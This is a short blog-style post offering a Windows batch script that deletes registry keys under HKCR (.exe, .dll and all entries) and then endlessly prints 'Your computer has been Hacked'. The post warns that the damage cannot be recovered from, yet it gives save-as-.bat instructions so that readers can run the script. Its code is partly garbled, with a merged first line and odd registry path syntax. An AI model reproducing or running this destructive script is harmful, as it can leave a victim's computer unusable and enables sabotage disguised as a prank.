A easy batch programming to Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*
Code:-
@ECHO OFFCopy this program in notepad --> save as .bat extension
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been Hacked. Have a nice day.
GOTO MESSAGE
EmoticonEmoticon